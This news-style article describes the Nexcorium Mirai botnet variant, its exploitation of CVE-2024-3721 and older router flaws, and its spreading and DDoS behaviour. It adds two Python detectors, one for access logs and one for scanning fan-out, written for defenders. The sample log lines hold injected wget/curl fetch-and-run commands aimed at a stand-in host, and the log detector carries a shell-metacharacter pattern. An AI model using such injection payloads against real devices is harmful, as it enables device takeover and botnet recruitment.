
A newly identified variant of the Mirai botnet, named Nexcorium, is actively exploiting vulnerabilities in Internet of Things (IoT) devices to build large-scale distributed denial-of-service (DDoS) attack networks. Security researchers have observed threat actors targeting TBK digital video recorder devices and outdated TP-Link routers, highlighting the continued risks posed by unpatched and end-of-life hardware.
The campaign primarily leverages CVE-2024-3721, an OS command injection vulnerability in the web interface of TBK DVR-4104 and DVR-4216 models, which carries a CVSS score of 6.3. A single crafted HTTP request lets an attacker run operating-system commands on the device remotely, which is all that is needed to fetch and start a bot binary. The moderate CVSS score should not be read as low risk: the flaw is trivial to weaponize, and it has already been abused in other botnet campaigns, demonstrating its persistent appeal among cybercriminal groups.
Once access is gained, attackers use the injected command to deploy a downloader script that fetches and installs the Nexcorium malware, a multi-architecture Mirai-based variant with builds for the different CPU architectures found in Linux-based IoT devices. On launch the binary prints a banner announcing the takeover and establishes control over the compromised device. Its architecture follows the classic Mirai layout of watchdog, scanner, and attack modules: the watchdog keeps the bot process running, the scanner hunts for further victims, and the attack module executes commands received from a remote command-and-control server.
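As an added example for the exploitation and downloader stages described above (not code from the article or from the researchers it cites), the script below scans web-server access logs for CVE-2024-3721 exploitation attempts and extracts the payload URLs an attacker injects to stage the downloader. The endpoint path `/device.rsp` and the `mdb`/`mdc` parameters are taken from the public advisory for CVE-2024-3721; the log lines, the source addresses and the download host `198.51.100.9` are constructed sample data, not indicators from this campaign.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); not real traffic.
# Lines 1-2 are exploitation attempts, line 3 is a benign request to the same
# endpoint, line 4 is unrelated.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2025:12:00:01 +0000] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20/tmp;wget%20http://198.51.100.9/x.sh;sh%20x.sh HTTP/1.1" 200 142
203.0.113.7 - - [10/Jun/2025:12:00:02 +0000] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+/tmp%3Bcurl+-O+http%3A%2F%2F198.51.100.9%2Fx.sh HTTP/1.1" 200 142
192.0.2.5 - - [10/Jun/2025:12:00:03 +0000] "GET /device.rsp?opt=sys&cmd=getinfo HTTP/1.1" 200 512
192.0.2.6 - - [10/Jun/2025:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters that have no business in a DVR parameter but make a shell happy.
SHELL_META = re.compile(r'[;&|`$(){}]|\n')
# Staging URLs used by the injected command (wget/curl/tftp fetch of the downloader).
URL_RE = re.compile(r'(?:https?|tftp|ftp)://[^\s;&|\'"]+')

# Parameters named as the injection point in the CVE-2024-3721 advisory.
INJECTION_PARAMS = ('mdb', 'mdc')


def analyze_line(line):
    """Return a finding dict for a CVE-2024-3721 exploitation attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['target'])
    if url.path != '/device.rsp':
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent- and '+'-decodes once
    injected = {}
    for name in INJECTION_PARAMS:
        for value in params.get(name, []):
            value = unquote(value)  # second pass catches double-encoded payloads
            if SHELL_META.search(value):
                injected[name] = value
    if not injected:
        return None
    download_urls = sorted({u for v in injected.values() for u in URL_RE.findall(v)})
    return {
        'src': m['src'],
        'ts': m['ts'],
        'status': int(m['status']),
        'params': injected,
        'download_urls': download_urls,
    }


def scan_log(text):
    """Run analyze_line over every line and keep the hits."""
    return [hit for hit in (analyze_line(l) for l in text.splitlines()) if hit]


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['params']} staging={hit['download_urls']}")
```

The extracted staging URLs are the most useful output: they identify the host serving the downloader and can be fed straight into egress blocking. A 200 response to a request like this on a DVR that is still on the vulnerable firmware should be treated as a compromise, not an attempt.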
In addition to exploiting CVE-2024-3721, Nexcorium incorporates older vulnerabilities such as CVE-2017-17215, the 2017 remote code execution flaw in Huawei HG532 routers, to expand its infection reach. The malware also brute-forces logins using a built-in list of factory-default credentials (the original Mirai did this over Telnet), allowing it to rapidly scale its botnet across vulnerable networks. These combined techniques make it highly effective in spreading across poorly secured IoT environments, and they also make an infected device noisy: it fans out to large numbers of new addresses on a small set of ports.
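An added example (not code from the article or from the researchers it cites) of how that spreading behaviour shows up in network telemetry: the detector below takes flow records and flags any internal source that contacts many distinct destinations on scanner ports within a short window. Ports 23 and 2323 are the Telnet ports the original Mirai scanner brute-forces, and TCP 37215 is the UPnP port on which CVE-2017-17215 is exploited; the flow records, the host addresses and the threshold of 20 destinations per minute are constructed assumptions for the demonstration and will need tuning to a real network.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Ports a Mirai-style scanner reaches out to: Telnet (23/2323) for default-credential
# brute force, TCP 37215 for the CVE-2017-17215 Huawei HG532 exploit.
SCAN_PORTS = {23: "telnet", 2323: "telnet-alt", 37215: "hg532-upnp (CVE-2017-17215)"}
WINDOW = timedelta(seconds=60)
FANOUT_THRESHOLD = 20  # distinct destinations per source per window; assumed tuning value


def build_sample_flows():
    """Constructed flow records (ts, src, dst, dport); not real data.

    10.0.0.50 plays an infected DVR fanning out to 50 addresses in 30 seconds;
    10.0.0.7 is a benign host with HTTPS traffic and a single Telnet session.
    """
    base = datetime(2025, 6, 10, 12, 0, 0)
    flows = []
    for i in range(40):  # telnet sweep across 40 distinct targets
        flows.append((base + timedelta(seconds=i * 0.5), "10.0.0.50",
                      f"198.51.{i}.{(i * 7) % 256}", 23 if i % 3 else 2323))
    for i in range(10):  # HG532 exploit attempts against 10 more targets
        flows.append((base + timedelta(seconds=20 + i), "10.0.0.50", f"203.0.113.{i}", 37215))
    for i in range(30):  # benign host talking to two update servers
        flows.append((base + timedelta(seconds=i), "10.0.0.7",
                      "192.0.2.10" if i % 2 else "192.0.2.11", 443))
    flows.append((base, "10.0.0.7", "10.0.0.1", 23))  # one admin Telnet session, not a scan
    return flows


def detect_scanners(flows, threshold=FANOUT_THRESHOLD, window=WINDOW):
    """Sliding-window fan-out detection over scan-port flows.

    Returns {src: {distinct_dsts, ports, first, last}} for every source that reached
    at least `threshold` distinct destinations on SCAN_PORTS inside `window`.
    The most recent qualifying window for each source is kept.
    """
    per_src = defaultdict(list)
    for ts, src, dst, dport in sorted(flows):
        if dport in SCAN_PORTS:
            per_src[src].append((ts, dst, dport))

    alerts = {}
    for src, events in per_src.items():
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window forward
            in_window = events[start:end + 1]
            distinct = {dst for _, dst, _ in in_window}
            if len(distinct) >= threshold:
                alerts[src] = {
                    "distinct_dsts": len(distinct),
                    "ports": sorted({p for _, _, p in in_window}),
                    "first": events[start][0],
                    "last": events[end][0],
                }
    return alerts


if __name__ == "__main__":
    for src, info in detect_scanners(build_sample_flows()).items():
        names = ", ".join(SCAN_PORTS[p] for p in info["ports"])
        print(f"{src}: {info['distinct_dsts']} destinations on {names} "
              f"between {info['first']:%H:%M:%S} and {info['last']:%H:%M:%S}")
```

The benign host is not flagged because a single Telnet connection never reaches the fan-out threshold; the point of counting distinct destinations rather than raw packets is exactly that a scanner touches many addresses once each, while legitimate traffic touches a few addresses many times.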
Once enough devices are infected, Nexcorium enables attackers to launch a variety of DDoS attacks, including UDP and TCP floods, against websites, services, and infrastructure. Bots poll centralized command-and-control servers for attack instructions, so the same infrastructure that drives the floods is also the single point a defender can block or sinkhole. Experts warn that the campaign underscores the growing threat posed by IoT botnets and the urgent need for timely patching, secure configurations, and proactive monitoring: in practice that means replacing end-of-life DVRs and routers that will never receive a fix, changing factory-default credentials, keeping device management interfaces off the public internet, and watching for the outbound scanning and download activity that an infected device cannot avoid generating.




